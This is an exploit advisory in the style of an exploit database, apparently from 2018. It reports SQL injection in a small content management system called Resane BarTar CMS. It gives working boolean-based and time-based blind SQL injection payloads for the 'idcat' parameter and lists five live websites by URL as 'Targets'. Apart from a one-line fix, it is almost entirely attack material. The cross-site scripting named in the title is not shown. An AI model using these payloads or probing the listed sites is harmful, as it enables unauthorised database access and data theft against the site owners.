[+] Exploit Title ; Resane BarTar Cms Sql Injection / Cross Site Scripting Vulnerability
[+] Date : 2018-08-11
[+] Author : Work LearninG
[+] Vendor Homepage : http://resanebartar.ir
[+] Version : ...
[+] Dork : N/A
[+] My Site : https://worklearning.ir
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : support@worklearning.ir
[+] Description :
[!] Free content management system (CMS).
[+] Poc :
[!] http://localhost/page/divan?item=sqli
[+] Parameter: idcat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idcat=30') AND 9195=9195 AND ('rqdf'='rqdf
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: idcat=30') AND SLEEP(5) AND ('iGES'='iGES
[+] web application technology: PHP 5.3.29
[+] back-end DBMS: MySQL >= 5.0.12
Targets :
[!] http://resanebartar.ir/pages/allgallary?idcat=22
[!] http://gallerymaryam.ir/pages/divan?item=87
[!] http://modernclassicfurniture.ir/pages/allgallary.php?idcat=11
[!] http://www.parnianco.com/pages/allgallary.php?idcatall=2&idcat=9
[!] http://decoco.ir/pages/allgallaryy?idcat=30
[+] Security Level :
[!] Med
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] GET
[+] Vulnerability Link :
[*] http://localhost/admin.php
[+] Vulnerable File (s) :
[!] allgallary.php | allgallery | divan
[+] Fix :
[!] Restrict user input or replace bad characters
[+] We Are : [+] 0P3N3R [+]